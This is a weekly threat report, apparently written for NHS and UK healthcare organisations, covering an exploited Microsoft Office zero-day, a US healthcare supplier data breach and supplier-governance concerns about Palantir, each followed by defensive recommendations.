Threat Report 161

This week brings an actively exploited Microsoft Office zero-day, a major US healthcare data breach highlighting supply chain risks, and growing concerns about NHS supplier relationships with controversial organisations.

Microsoft Office Zero-Day Exploited

Microsoft released an emergency patch for a security flaw in Office that is already being used to attack organisations. The vulnerability, tracked as CVE-2026-21509, allows attackers to bypass security features that normally stop unsafe older components from running. These components, called COM and OLE, have been used in document-based attacks for many years. Attackers can exploit this flaw by tricking someone into opening a specially crafted file, such as a malicious Word document or Excel spreadsheet.

NHS organisations and healthcare suppliers rely heavily on Microsoft Office for clinical correspondence, patient records management, and administrative workflows. A compromised Office installation can provide attackers with access to sensitive patient information and critical systems. The vulnerability does not require the preview pane to trigger, making it easier for attackers to exploit. For DSPT compliance, organisations must demonstrate they apply security patches promptly. Failing to patch this actively exploited vulnerability could result in compliance failures and data breaches.

Recommendations

• Apply Microsoft's emergency patch for CVE-2026-21509 immediately across all Office installations
• For older Office versions (2016 and 2019) where patches are unavailable, implement the registry workarounds provided by Microsoft to block vulnerable COM and OLE controls
• Review email filtering rules to block suspicious Office documents from unknown senders
• Educate staff about the risks of opening unexpected email attachments, even from seemingly trusted sources
• Monitor systems for unusual Office process behaviour or unexpected network connections
• Add CVE-2026-21509 to your vulnerability management tracking

Major US Healthcare Provider Data Breach Exposes Supply Chain Risks

TriZetto Provider Solutions, a major US insurance verification provider owned by Cognizant, disclosed a data breach affecting over 700,000 patients across multiple US states. Attackers gained unauthorised access to the company's systems back in November 2024 but were not discovered until October 2025, giving them nearly a year of access to protected health information. The breach affected healthcare providers in Oregon, Massachusetts, Oklahoma, and California. TriZetto eliminated the threat on 2 October 2025 and engaged external cybersecurity experts from Mandiant. This is not a ransomware incident, according to Cognizant, but stolen data included sensitive patient information such as names, dates of birth, medical record numbers, and insurance details.

While this breach primarily affects US healthcare providers, it highlights critical supply chain security risks for UK health organisations and NHS suppliers. Many UK providers depend on international software and service vendors for administrative systems and back-office functions. The incident shows how third-party suppliers can be compromised for long periods without detection, exposing sensitive patient data. For UK organisations with international operations or US-based suppliers, this reinforces the need for robust vendor security assessments and ongoing monitoring. DSPT requires effective management of third-party risks, and incidents like this show why rigorous supplier due diligence is essential.

Recommendations

• Review all third-party healthcare technology suppliers, particularly those handling patient data or providing administrative systems
• Verify that suppliers undergo regular security assessments and penetration testing
• Ensure contracts include clear data breach notification requirements and timelines for disclosure
• Implement monitoring for unusual data access patterns from supplier connections
• Conduct tabletop exercises that include supplier breach scenarios
• For organisations with US operations or US-based suppliers, review HIPAA compliance status and incident response procedures
• Consider implementing additional monitoring controls for supplier access to sensitive systems
• Review DSPT supplier assurance requirements and ensure all suppliers meet necessary standards

Concerns Mount Over Major NHS Supplier's Links with US Immigration Enforcement

Reports emerged this month that Palantir Technologies, a major NHS data platform supplier under a £330 million contract, has developed tools for US Immigration and Customs Enforcement that use healthcare data to track individuals. The tool, called ELITE, reportedly uses Medicaid and other government data to create dossiers on potential deportation targets. Palantir holds the contract for the NHS Federated Data Platform, designed to bring together NHS data for improved patient care and operational efficiency. The company has faced ongoing scrutiny over its work with intelligence and security services, and concerns about data governance and the ethical implications of its contracts.

While Palantir's work with US immigration enforcement does not directly affect NHS data security, it raises important questions about supplier relationships and data governance that are relevant to DSPT compliance and public trust. NHS organisations are required to demonstrate robust data protection practices and appropriate oversight of suppliers. The controversy highlights the importance of understanding the full scope of major suppliers' activities, particularly those handling sensitive patient information. Public confidence in NHS data systems depends on transparent governance and ethical supplier relationships. Healthcare organisations should be aware of these concerns as they affect the reputation and trustworthiness of key technology partners, even when technical security measures are in place.

Recommendations

• Review supplier contracts to ensure clear data governance provisions and ethical use clauses
• Monitor public reporting and news about major technology suppliers to stay informed of reputational risks
• Ensure supplier assurance processes include consideration of broader ethical and governance concerns
• Maintain open communication with patients and stakeholders about how NHS data is managed and protected
• Consider these factors as part of ongoing supplier risk assessments and contract renewal decisions
• Document your organisation's approach to supplier oversight in DSPT evidence
• Engage with NHS England guidance on supplier relationships and data platform adoption
• Review your organisation's position on the Federated Data Platform and document the rationale for your approach